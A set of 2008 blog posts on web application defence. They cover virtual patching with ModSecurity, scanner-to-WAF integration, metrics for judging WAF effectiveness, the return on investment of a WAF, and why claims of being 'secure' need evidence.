So the point is that Pandora's box is already open once vendors release patches. What they should do, then, is give technical details so that security folks can implement some defenses (for IDSs/IPSs). A great example of this is when the Bleeding Edge/Emerging Threats folks create Snort signatures so that an organization can identify if someone is attempting to exploit a flaw.

Now, the whole point of this post is to highlight that I have been fighting the good fight with many vendors to try and get them to see the light on the value of either releasing technical details on web-based vulnerabilities so that end users can create virtual patches with a web application firewall, or, even better, of the vendor releasing some virtual patches themselves (using the ModSecurity rules language). Well, we haven't achieved the latter yet, but we are seeing signs that both Oracle and Microsoft are starting to address the former. Specifically, Oracle/BEA recently released details about a WebLogic plug-in for Apache, and in the mitigation section they actually mentioned the use of ModSecurity to address the problem! That is a huge step and something that I am extremely excited about. Then, just within the last week, we saw the announcement of Microsoft's Active Protections Program (MAPP). Here is the short overview -

The Microsoft Active Protections Program (MAPP) is a new program that will provide vulnerability information to security software providers in advance of Microsoft Corp.’s monthly security update release. By receiving vulnerability information earlier, security software providers can give customers potential improvements to provide security protection features, such as third-party intrusion detection systems, intrusion prevention systems or security software signatures.
This is certainly an interesting initiative and may help organizations receive more timely mitigation options to protect themselves until the official patches are deployed.

Overall, I have to say: GREAT job, Oracle and Microsoft, for truly helping your customers close their time-to-fix windows.

Friday, June 6, 2008

Integrating Vulnerability Scanners and Web Application Firewalls

Submitted by Ryan Barnett 6/6/2008

In case you missed it, Breach Security has teamed up with WhiteHat Security so that their Sentinel scanning service will automatically create custom ModSecurity rules for certain classes of vulnerabilities that they find in your web applications. This works with both open source ModSecurity installations and with the commercial M1100 appliance. If your initial reaction to this is not "Wow, that is cool!" then you probably have never been in the operational security position of having to protect public web applications. In order to paint a better picture of why this is a pretty slick integration, let me provide you with some background.

As I mentioned in my previous post - What's the Score of the Game - I feel that one of the areas where organizations are failing, with regard to web application security, is the lack of communication between the following three groups: development teams (who are running source code reviews), InfoSec teams (who are running vulnerability scans) and operational security teams (who are running web application firewalls). These three teams each have a unique perspective on the vulnerabilities of the webapps, and they should share their data with each other.

Speaking from my own personal experience, I used to lead an operational security team for a federal government customer. I was charged with defending the public web applications and had built some home-grown ModSecurity WAFs to allow me to implement virtual patches for identified vulnerabilities while the development teams tried to address the root causes. Unfortunately, much of my time was spent simply tracking down information about a vulnerability. Either the vulnerability scanning team did not provide OpSec with the results, or the development teams didn't want to provide details about their "Ugly Baby". So, I would get an initial statement that application X had an SQL Injection issue, but with no actionable details (which host, URL and parameter).

When I did track the technical information down, the next step was to analyze the details to see if it provided enough information for me to create an appropriate filter. This was hit and miss, especially if the vulnerability scans were not tuned or if the secure code review consultant didn't understand how to abstract out and explain how a remote client could exploit the issue. The point is that I spent a fair amount of time in the research phase.

When I did get enough information, I then had to create some ModSecurity rules and run through some testing to ensure that it functioned as expected and did not deny any legitimate traffic. I could then deploy the virtual patch in production in a logging-only mode until we could schedule a re-scan. At that point I could switch it into a blocking mode.
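That log-first, block-later workflow can be sketched in ModSecurity rule form (the parameter name and pattern below are hypothetical, chosen only to show the mechanics):

```apache
# Stage 1 - detection-only: the virtual patch logs matches via the
# non-disruptive "pass" action, so no legitimate traffic can be denied
# while the rule is being vetted in production.
SecRule ARGS:comment "@rx <\s*script" \
    "phase:2,t:none,t:lowercase,pass,log,auditlog,msg:'Virtual Patch (monitor): XSS attempt'"

# Stage 2 - once a re-scan confirms the rule fires only on real attacks,
# the same rule is switched to blocking by swapping "pass" for "deny":
# SecRule ARGS:comment "@rx <\s*script" \
#     "phase:2,t:none,t:lowercase,deny,status:403,log,auditlog,msg:'Virtual Patch: XSS blocked'"
```

The only change between the two stages is the disruptive action, which keeps the detection logic identical between what you tested and what you enforce.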

When considering the whole "Time to Fix" concept, the process I was going through was much faster than the actual source code fixing route; however, it was still manually intensive and took a fair amount of time. This is where I believe the real value of the Sentinel + ModSecurity integration shows: by automatically creating these custom ModSecurity virtual patches, we are solving two big problems -


  1. Shrinking the time to fix - the process is expedited as the WAF analyst does not need to manually research, create and test the virtual patch, and
  2. Increased confidence in blocking - The virtual patch is a targeted negative security filter that will not block legitimate traffic.
One other added benefit is that many organizations do not necessarily have technical staff with the required skillset to properly create ModSecurity virtual patches. With this integration, you don't have to have a ModSecurity guru on staff to create the rules. It will be very interesting as WhiteHat Security starts to track the "Time to Fix" metrics of their clients, to see how the customers who have ModSecurity installed fare against those that are using traditional code change processes!

Friday, May 30, 2008

What's the Score of the Game - Part 2: Web Security Metrics

In my earlier post entitled "What's the Score of the Game?" I presented the concept that what ultimately matters with web application security is how the application performs during a "real game," meaning when it is deployed live on the production network. Everything else that happens before that time is preparation. It is important preparation; however, no one is given the Lombardi Trophy based on how hard they practiced! No, you actually have to play in and win the Super Bowl in order to obtain that hardware :) So, referencing back to the title of this post, if the production network is "where" the webappsec game is actually played, then the next logical question is "How do we keep score?"

This is where web security metrics come into play.

When I say web security metrics, I am referring to data that is relevant to answering the question - are we winning or losing the game? In football, in order to win the game you have to have more points than your opponent at the end of the game. In webappsec, if you are in charge of defending a web application, you win if an attacker tries to compromise your site and is unable to. This seems like a "duh" statement, but it actually isn't when you consider how many web security vendors try to tell you the "score of the game". Most vendors will present customers with colorful pie charts stating that a web site has X number of vulnerabilities or that they blocked X number of attacks. This is like asking who won the Giants vs. Patriots game and getting the response: the Patriots completed 35 passes, while the Giants intercepted them 3 times. Not really answering the question, is it? While some customers may be distracted by eye-catching graphical displays of this information, the savvy ones will ask the key question - were there any successful attacks? The answer to this question will tell you the score of the game - did the opponent score any touchdowns??? All other data is corollary.

Sidebar - realistically you are dealing with two different types of attacks: the automated kind, where an attacker is targeting a specific vuln and searching for sites that have it, and the manual type, where the attacker is targeting your site specifically and must then find a vuln to exploit. The former is like a football opponent trying one desperate Hail Mary pass down the field as time expires. If you bat the football down, you win. If you don't, you lose. The latter is like a methodical 99-yard drive down the field, where your opponent runs 2-yard dive plays left and right and slowly marches toward the end zone. If you give them enough time, they will most likely score. In this case, it is critical that your webappsec defenses force the attacker to manually search for complex logical flaws or develop evasions; given that delay, you may be able to implement countermeasures before they succeed.

With this concept as a backdrop, let me present the web security metrics that I feel are most important for the production network and gauging how the web application's security mechanisms are performing -

  1. Web Transactions per Day - This should be represented as a number (#) and establishes a baseline of web traffic and provides some perspective for the other metrics. Some WAFs will be able to keep track of this data on their own. If this is not possible then you would need to correlate web server log data.
  2. Attacks Detected/True Positive - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of malicious web traffic. These numbers are presented in all WAF reporting functions.
  3. Missed Attacks/False Negative - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of the effectiveness of the web application firewall's detection accuracy. This is the key metric that is missing when people are trying to determine their webappsec success. If the WAF is configured for "alert-centric" logging, and therefore only logging blocked attacks, then you will not be able to report on this data automatically using the WAF's built-in reporting facilities. If, on the other hand, the WAF is audit logging all relevant traffic (requests for non-static resources, etc...), then an analyst would have raw data to conduct batch analysis and identify missed attacks. The fall-back data source would be whatever incident response processes exist for the organization. There may be other sources of data (web logs, IDS, etc...) where a web attack may be confirmed.
  4. Blocked Traffic/False Positive - This data should be represented as both a number (#) and as a percentage (%) of item 1 - total web transactions. This data is a general indicator of the effectiveness of the web application firewall's detection accuracy. This is very important data for many organizations, because blocking legitimate customer traffic can mean missed revenue. It can usually be identified by evaluating any exceptions that needed to be implemented on the WAF in order to allow "legitimate" traffic that was otherwise triggering a negative security rule or signature. Besides exceptions, this data can be identified in reports if the WAF has appropriate alert ticketing interfaces where an analyst can categorize the alert.
  5. Attack Detection Failure Rate - This data should be represented as a percentage (%) and is derived by adding items 3 (false negatives) and 4 (false positives) and then dividing by item 2 (true positives). This percentage gives the overall effectiveness of the web application firewall's detection accuracy - meaning the score of the game.
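The arithmetic behind these five metrics is simple enough to sketch in a few lines of Python. The counts below are invented purely for illustration; the failure-rate formula follows the definition in item 5 (false negatives plus false positives, divided by true positives):

```python
# Illustrative computation of the web security metrics above.
# All counts are made-up example numbers, not real measurements.
transactions = 1_000_000   # 1. total web transactions per day
true_pos     = 2_000       # 2. attacks detected (true positives)
false_neg    = 40          # 3. missed attacks (false negatives)
false_pos    = 60          # 4. blocked legitimate traffic (false positives)

# Items 2-4 expressed as percentages of total transactions (item 1)
tp_pct = 100.0 * true_pos  / transactions
fn_pct = 100.0 * false_neg / transactions
fp_pct = 100.0 * false_pos / transactions

# 5. Attack Detection Failure Rate: (FN + FP) / TP, per the definition above
failure_rate = 100.0 * (false_neg + false_pos) / true_pos

print(f"True positives: {true_pos} ({tp_pct:.3f}% of traffic)")
print(f"Attack Detection Failure Rate: {failure_rate:.1f}%")
```

With these example numbers, 100 misclassified transactions against 2,000 true positives yields a 5% failure rate; trending that single percentage over time is what tells you whether your detection accuracy is improving.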

Sidebar - I am referencing web application firewalls in the metrics, as they are specifically designed to report on this type of data. You could substitute any security filtering mechanism built directly into the webapp code; however, many implementations do not adequately provide logging and reporting for this data. Such code may present users with a friendly error message, but from the back-end logging perspective it is essentially performing "silent drops" of requests.

As stated earlier, many webappsec vendors will only provide statistics related to item #2 (detected attacks). While this data does factor into the equation, it does not provide the best indicator of overall web application security on its own. So, if you really want to know the score of the game for your web applications, I suggest you start tracking the metrics provided in this post.

Tuesday, May 20, 2008

What's the Score of the Game?

We, as the webappsec community, should try and move away from "Holy Wars" debating that there is only one right way to address web application vulnerabilities - source code reviews, vulnerability scanning or web application firewalls - and instead focus on the end results. Specifically, instead of obsessing on Inputs (using application x to scan) we should turn our attention towards Outputs (web application hackability). This concept has been skillfully promoted by Richard Bejtlich of TaoSecurity and is called Control-Compliant vs. Field-Assessed security. Here is a short paragraph intro:

In brief, too many organizations, regulators, and government agencies waste precious time and resources devising and auditing "controls," regardless of the effect these controls have or do not have on security. They are far too input-centric; they should become more output-aware. They obsess over recording conditions they believe may be helpful while remaining ignorant of the "score of the game." They practice management by belief and disregard management by fact.

While the impetus for Richard's soapbox rant was the government auditing mindset, we can apply this same "input-centric" critique to the current state of webappsec. Due to regulations such as PCI, we are unfortunately framing web security through an input-centric lens and forcing users to check a box stating that they are utilizing process X, rather than formulating a strategy to conduct field assessments and obtain proper metrics on how difficult it is to hack into the site. We are focusing too much on whether a web application's code was manually or automatically reviewed, or whether it was scanned with vendor X's scanner, rather than focusing on what is really important - did these activities actually prevent someone from breaking into the web application? If the answer is no, then who really cares what process you followed? More specifically, the fact that your site was PCI compliant at the time of the hack is going to be of little consequence.

Let's take a look at each of these input-centric processes through another great analogy by Richard:

Imagine a football (American-style) team that wants to measure their success during a particular season. Team management decides to measure the height and weight of each player. They time how fast the player runs the 40 yard dash. They note the college from which each player graduated. They collect many other statistics as well, then spend time debating which ones best indicate how successful the football team is. Should the center weigh over 300 pounds? Should the wide receivers have a shoe size of 11 or greater? Should players from the north-west be on the starting line-up? All of this seems perfectly rational to this team. An outsider looks at the situation and says: "Check the scoreboard! You're down 42-7 and you have a 1-6 record. You guys are losers!"

This is an analogy that I have been using more and more recently when discussing source code reviews, as they are somewhat like the NFL Scouting Combine. Does measuring each player's physical abilities guarantee a player's or team's success? Of course not. Does it play a factor in the outcome of an actual game? Usually; however, a team's draft grade does not always project to actual wins the following season. Similarly, is using an input validation security framework a good idea? Absolutely; however, the important point is to look at the web application holistically in a "real game environment" - meaning in production - to see how it performs.

Sticking with the analogy, vulnerability scanning in dev environments is akin to running an intra-squad scrimmage. It is much closer to actual game conditions - there is an offense and a defense, players are wearing pads, there is a time clock, etc... - but one key element is missing: the opponent. Vulnerability scanners do not act the same way that attackers do. Attackers are unpredictable. This is why, even though a team reviews film of their opponent to identify tendencies and devise a game plan, it is absolutely critical that the team is able to make adjustments on the fly during a game. It is for this reason that running vulnerability scans in production is critical, as you need to test the live system.

Running actual zero-knowledge penetration tests is like Pre-season games in the NFL. The opponent in this case is acting much more like a real attacker would and is actually exploiting vulnerabilities rather than probing and making inferences about vulnerabilities. It is as close as you can get to the real thing, except that the outcome of the game doesn't matter :)

Web application firewalls running in detection-only mode are like trying to play a real football game with only two-hand touch. If you don't really try to tackle your opponent to the ground (meaning implement blocking capabilities), then you will never truly prevent an attack. Also, as most of you have seen with premier running backs in the NFL, they have tremendous "evasion" capabilities, such as spin moves and stiff-arms, that make it difficult for defenders to tackle them. It is the same for web application layer attacks: WAFs need to be running in blocking mode and have proper anti-evasion normalization features in order to properly prevent attacks.

It is on the live production network where all of your security preparations will pay off, or, on the other hand, where your web application security will crash and burn. I very seldom see development and staging areas that adequately mimic the production environment, which means that you will not truly know how your web application security will fare until it is exposed to un-trusted clients. When your web application goes live, it is critical that your entire "team" (development, assessment and operations) is focused and able to quickly respond to the unexpected behavior of clients. The problem is that these groups do not always communicate effectively and coordinate their efforts. Specifically, each of these three groups should be sharing its output with the other two:

Conduct code reviews on all web applications and fix the identified issues. The code reviews should be conducted when applications are initially being developed and placed into production, and also when there are code changes. Any issues that cannot be fixed immediately should be identified and passed on to the vulnerability scanning and WAF teams for monitoring and remediation.

Conduct vulnerability scans and penetration tests on all web applications. These should be conducted prior to an application going online, then at regularly scheduled intervals, and on an on-demand basis when code changes are made. Any issues identified should be passed on to the development and WAF teams for remediation.

Deploy a Web Application Firewall in front of all web servers. A WAF will provide protection in production. When the WAF identifies issues with the web application, it can provide reports back to both the development and vulnerability scanning teams for remediation and monitoring. It is this on-the-fly, in-game agility where a WAF shines.

Are game-time adjustments always the absolute best option when they are being reviewed in film sessions the following day, or on Monday by armchair quarterbacks? Nope, but that is OK. They can be adjusted. This film review will also allow for the identification of root-cause issues so that they can be fixed (source code changes) in preparation for the next game.

Friday, February 1, 2008

Tangible ROI of a Web Application Firewall (WAF)

One of the challenges facing organizations that need to increase the security of their web applications is to concretely provide appropriate "Return On Investment" (ROI) for procurement justification. Organizations can only allocate a finite amount of budget towards security efforts therefore security managers need to be able to justify any commercial services, tools and appliances they want to deploy. As most people who have worked in information security for an extended period of time know, producing tangible ROI for security efforts that address business driver needs is both quite challenging and critically important.

The challenge for security managers is to not focus on the technical intricacies of the latest complex web application vulnerability or attack. C-level Executives do not have the time, and in most instances the desire, to know the nuances of an HTTP Request Smuggling attack. That is what they are paying you for! Security managers need to function as a type of liaison where they can take data from the Subject Matter Experts (SMEs) and then translate that into a business value that is important to the C-level Executive.

One almost-guaranteed pain point for most executives is the vulnerability scan reports presented by auditors. The auditors are usually brought in from, and reporting to, a higher-level third party (be it OMB in the government or PCI for retail). Executives like to see "clean vulnerability scan reports." While a clean report will certainly not guarantee that your web application is 100% secure, it can certainly help to prove the counter-argument. And to make matters worse, nothing is more frustrating to upper management than auditor reports that list repeat vulnerabilities that either never go away or pull the "Houdini" trick (they disappear for a while only to suddenly reappear). Sidebar - see Jeremiah Grossman's blog post for examples of this phenomenon. These situations are usually attributed to breakdowns in the Software Development Life Cycle (SDLC), where code updates are too time consuming or the change control processes are poor.

This is one of the best examples of where a Web Application Firewall can prove its ROI.

At Breach Security, we receive many inbound calls from prospects who are interested in WAF technology but are lacking that "big stick" that helps convince upper management to actually make the purchase. The best approach we have found is to suggest a "before and after" comparison of a vulnerability scan report while they are testing the WAF on their network. The idea is to deploy the WAF in blocking mode and then initiate a rescan of a protected site. The difference in the reduction of findings is an immediate, quantitative ROI.

Here is a real example. One of our current customers followed this exact roadmap and this is a summary (slightly edited to remove sensitive information) of the information they sent back to us:

Our WAF is installed and running. I have tested its impact on www.example.com and it is operating very admirably. This morning I had the vulnerability scanning team run an on-demand scan to test the efficacy of the appliance, and I was very impressed with the results. Our previous metrics for www.example.com in the last scan were 64 vulnerabilities, across all outside IP addresses (including www.example.com, example2.com, example3.com, etc.) and with the Breach appliance in place, the metric from today's scan was 5 vulnerabilities, with details:

- High vulnerabilities dropped from 38 to 0

- Medium vulnerabilities dropped from 12 to 0

- 1 low vulnerability remains due to simply running a web server (we will eliminate this via exception)

- 1 low vulnerability due to a file/folder naming convention that is typical and attracts unwanted attacks (will be eliminated via rule addition)

Bear in mind that I have applied the appliance with a basic (almost strictly out-of-the-box) configuration and ruleset to protect only www.example.com (192.168.1.100 in the report), and the 35 warnings that remain are for the other websites, and would similarly disappear when protected by the appliance. In my opinion, this was a very successful test that indicates the effectiveness of the appliance.

So, looking at the report after the WAF was in place, the www.example.com web site shed 38 high and 12 medium vulnerabilities and was left with only 2 low ones (which are really just informational notices). That is pretty darn good, and that was just with the default, generic-detection ModSecurity rule set! Hopefully this information has helped to provide a possible use-case testing scenario to show the tangible ROI of a WAF.

In a future post, I will discuss how custom WAF rule sets can be implemented to address more complex vulnerability issues identified not by a scanner but by actual people who have performed a web assessment/pentest.

Wednesday, January 30, 2008

Is Your Website Secure? Prove It.

The recent Geeks.com compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks goes to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post forms the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light on specific areas of strength and weakness.

What does it mean to be secure?

Obviously, having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed at reassuring potential customers that it is safe to purchase goods at the site. The reality is that these logos are unreliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six-word question into: are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of each answer as well. For the purpose of this exercise, let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the various levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence, for you non-imaginative folks). This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way: would auditors accept this answer? Could you pass a PCI audit by simply responding "yeah, we are secure"? Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear: yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. A while back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message: "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring, as I obviously did not want to send my credit card number to them in clear text.

During the checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" icon in the lower right-hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order, so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:

To:companyname@aol.com
From: RCBarnett@email.com
Subject:ONLINE HERBPACK!!!
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
phone#:
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black: number of hats-gray:
number of hats-navy: number of hats-red:
number of hats-rtcamo: number of hats-orange:
do you want it shipped to a friend:
name:
their address:
their city:
their state:
their zip:

cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, is a minimum standard of due care, and passing the audit does not make your site "unhackable." A compliant enterprise is like an ocean liner that is presumed safe simply because it left dry dock with lifeboats and life jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."
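To make the "audit-centric" idea above concrete, here is a minimal sketch of a ModSecurity 2.x configuration that records full transactions rather than only rule matches. The directives are real ModSecurity directives, but the log path and the exact set of audit-log parts are illustrative assumptions; tune them for your own environment and data-retention policies.

```apache
# Log every transaction, not just those that trigger a rule
# (the default "RelevantOnly" setting is the alert-centric mode).
SecAuditEngine On

# Capture the full HTTP exchange: A=audit header, B=request headers,
# C=request body, E=response body, F=response headers, H=trailer,
# Z=end marker.
SecAuditLogParts ABCEFHZ

# Response bodies must be buffered for part E to be recorded.
SecResponseBodyAccess On

# Serial mode writes one flat file; concurrent mode (one file per
# transaction) scales better on busy sites. Path is an example only.
SecAuditLogType Serial
SecAuditLog /var/log/modsec_audit.log
```

With a configuration along these lines, the WAF doubles as an HTTP-level flight recorder: even traffic that matched no signature is available later for incident response.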

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations cannot provide this answer. Put it this way: Common Log Format (CLF) logs are not adequate for full web-based incident response. Too much data is missing. If this is really close, why isn't it correct?
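To illustrate why CLF falls short, consider a typical (made-up) access-log entry for a login request. Apache's common format records only the request line, status, and byte count:

```apache
# Example CLF entry (fabricated data) as produced by the standard
# Apache "common" LogFormat directive:
#   LogFormat "%h %l %u %t \"%r\" %>s %b" common
#
# 192.0.2.10 - - [30/Jan/2008:10:15:32 -0500] "POST /login HTTP/1.1" 200 1843
```

Notice what is absent: the request headers, the POST body (the credentials or injected payload), and the entire response. An investigator looking at this line cannot tell whether the login succeeded for a legitimate user or whether the body carried a SQL injection string, which is exactly the gap that full HTTP audit logging closes.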

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Consider this practical exercise: if you run a zero-knowledge (meaning unannounced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.

Conclusion

Indirectly, this post also explains why doing only one of the following (web vulnerability scanning, penetration testing, deploying a web application firewall, or log analysis) does not adequately ensure "security." While each of these tasks excels in some areas and aids in the overall security of a website, each is also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."